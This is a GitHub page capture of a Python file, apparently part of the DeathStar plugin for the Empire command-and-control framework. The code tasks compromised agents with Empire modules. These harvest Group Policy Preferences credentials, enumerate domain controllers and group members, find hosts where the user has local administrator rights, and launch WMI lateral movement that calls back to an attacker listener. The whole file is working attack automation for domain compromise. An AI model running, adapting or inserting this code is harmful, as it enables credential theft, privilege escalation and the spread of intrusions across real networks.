-
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathrun_tasks.py
115 lines (103 loc) · 3.64 KB
/
run_tasks.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
from empire.server.api.v2.agent.agent_task_dto import ModulePostRequest
class DeathStarTasks:
def __init__(self, main_menu):
self.main_menu = main_menu
def run_get_gpp(self, db, session_id):
agent = self.main_menu.agentsv2.get_by_id(db, session_id)
params = {
"Agent": session_id,
"OutputFunction": "Out-String",
}
module_post_request = ModulePostRequest(
module_id="powershell_privesc_gpp", options=params
)
res, err = self.main_menu.agenttasksv2.create_task_module(
db, agent, module_post_request, 0
)
if not err:
return res.id
else:
return False
def run_get_domain_controller(self, db, session_id):
agent = self.main_menu.agentsv2.get_by_id(db, session_id)
params = {
"Agent": session_id,
"OutputFunction": "Out-String",
}
module_post_request = ModulePostRequest(
module_id="powershell_situational_awareness_network_powerview_get_domain_controller",
options=params,
)
res, err = self.main_menu.agenttasksv2.create_task_module(
db, agent, module_post_request, 0
)
if not err:
return res.id
else:
return False
def run_get_group_member(self, db, sid, session_id):
agent = self.main_menu.agentsv2.get_by_id(db, session_id)
params = {
"Agent": session_id,
"OutputFunction": "Out-String",
"Identity": sid,
"Recurse": "True",
}
module_post_request = ModulePostRequest(
module_id="powershell_situational_awareness_network_powerview_get_group_member",
options=params,
)
res, err = self.main_menu.agenttasksv2.create_task_module(
db, agent, module_post_request, 0
)
if not err:
return res.id
else:
return False
def run_find_localadmin(self, db, session_id, domain_controller, domain):
agent = self.main_menu.agentsv2.get_by_id(db, session_id)
params = {
"Agent": session_id,
"OutputFunction": "Out-String",
"ComputerDomain": domain,
"Server": domain_controller,
"ServerTimeLimit": "60",
}
module_post_request = ModulePostRequest(
module_id="powershell_situational_awareness_network_powerview_find_localadmin_access",
options=params,
)
res, err = self.main_menu.agenttasksv2.create_task_module(
db, agent, module_post_request, 0
)
if not err:
return res.id
else:
return False
def run_invoke_wmi(self, db, session_id, listener, computer_name):
agent = self.main_menu.agentsv2.get_by_id(db, session_id)
params = {
"Agent": session_id,
"Listener": listener,
"UserName": "",
"Password": "",
"OutputFunction": "Out-String",
"ComputerName": computer_name,
"Obfuscate": "False",
"ObfuscationCommand": r"Token\All\1",
"ProxyCreds": "default",
"Proxy": "default",
"UserAgent": "default",
}
module_post_request = ModulePostRequest(
module_id="powershell_lateral_movement_invoke_wmi",
options=params,
)
res, err = self.main_menu.agenttasksv2.create_task_module(
db, agent, module_post_request, 0
)
if not err:
return res.id
else:
print("Error")
return False